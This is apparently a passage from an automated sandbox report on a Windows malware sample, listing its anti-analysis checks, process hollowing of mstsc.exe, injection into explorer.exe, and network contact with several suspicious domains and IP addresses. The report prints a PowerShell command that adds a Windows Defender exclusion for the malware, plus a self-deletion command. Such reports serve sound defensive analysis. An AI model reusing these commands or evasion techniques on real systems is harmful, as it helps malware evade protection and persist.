      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeAPI/Special instruction interceptor: Address: 7731BECA
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeAPI/Special instruction interceptor: Address: 7731D51A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeAPI/Special instruction interceptor: Address: 7731D26A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeAPI/Special instruction interceptor: Address: 7731C18A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeAPI/Special instruction interceptor: Address: 7731C25A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeAPI/Special instruction interceptor: Address: 7731BE2A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731BECA
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731D51A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731C1DA
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731BFBA
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731BFDA
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731BE2A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731D26A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731C18A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731C25A
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 89B7E second address: 89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 250000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 5FB0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 5120000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 6FB0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 7FB0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 88B0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 98B0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DB0101 rdtsc 7_2_00DB0101
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2016Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5599Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 9777Jump to behavior
      Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_9-13985
      Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 1.2 %
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3600Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe TID: 3756Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3940Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 4020Thread sleep count: 191 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 4020Thread sleep time: -382000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 4020Thread sleep count: 9777 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 4020Thread sleep time: -19554000s >= -30000sJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 4068Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_009420E2 PathFindFileNameW,PathAppendW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,FindNextFileW,PathAppendW,FindNextFileW,FindClose,10_2_009420E2
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
      Source: explorer.exe, 00000009.00000002.929382715.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000009.00000002.929382715.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
      Source: explorer.exe, 00000009.00000000.421597302.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
      Source: explorer.exe, 00000009.00000002.929382715.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DB0101 rdtsc 7_2_00DB0101
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D600C4 NtCreateFile,LdrInitializeThunk,7_2_00D600C4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00943AE1 LoadLibraryW,GetProcAddress,FreeLibrary,10_2_00943AE1
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D500EA mov eax, dword ptr fs:[00000030h]7_2_00D500EA
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D50080 mov ecx, dword ptr fs:[00000030h]7_2_00D50080
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D726F8 mov eax, dword ptr fs:[00000030h]7_2_00D726F8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02290080 mov ecx, dword ptr fs:[00000030h]10_2_02290080
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022900EA mov eax, dword ptr fs:[00000030h]10_2_022900EA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022B26F8 mov eax, dword ptr fs:[00000030h]10_2_022B26F8
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00968791 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00968791
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.launchyouglobal.com
      Source: C:\Windows\explorer.exeDomain query: www.ko-or-a-news.com
      Source: C:\Windows\explorer.exeNetwork Connect: 68.66.226.117 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.affirmationtotebags.com
      Source: C:\Windows\explorer.exeDomain query: www.education2jobs.com
      Source: C:\Windows\explorer.exeDomain query: www.thecareskin.com
      Source: C:\Windows\explorer.exeDomain query: www.opmk.monster
      Source: C:\Windows\explorer.exeNetwork Connect: 13.248.213.45 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.mbbwa4wp.cfd
      Source: C:\Windows\explorer.exeDomain query: www.fcno30.com
      Source: C:\Windows\explorer.exeDomain query: www.lifeofthobes.uk
      Adds a directory exclusion to Windows Defender
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Found direct / indirect Syscall (likely to bypass EDR)
      Source: C:\Windows\SysWOW64\mstsc.exeNtClose: Indirect: 0x2049DC5
      Source: C:\Windows\SysWOW64\mstsc.exeNtUnmapViewOfSection: Indirect: 0x2049DB9Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeNtMapViewOfSection: Indirect: 0x2049D47Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeNtQueueApcThread: Indirect: 0x204A531Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeNtClose: Indirect: 0x19A56C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeNtQueueApcThread: Indirect: 0x19A4F2Jump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory written: C:\Users\user\AppData\Roaming\ihbgfbin.exe base: 400000 value starts with: 4D5AJump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeThread register set: target process: 1244Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 1244Jump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 900000Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
      Source: explorer.exe, 00000009.00000000.420880686.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.928557977.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000009.00000000.420880686.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.928557977.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000009.00000000.420880686.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.928557977.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: GetLocaleInfoW,wcsncmp,10_2_0096770C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeQueries volume information: C:\Users\user\AppData\Roaming\ihbgfbin.exe VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
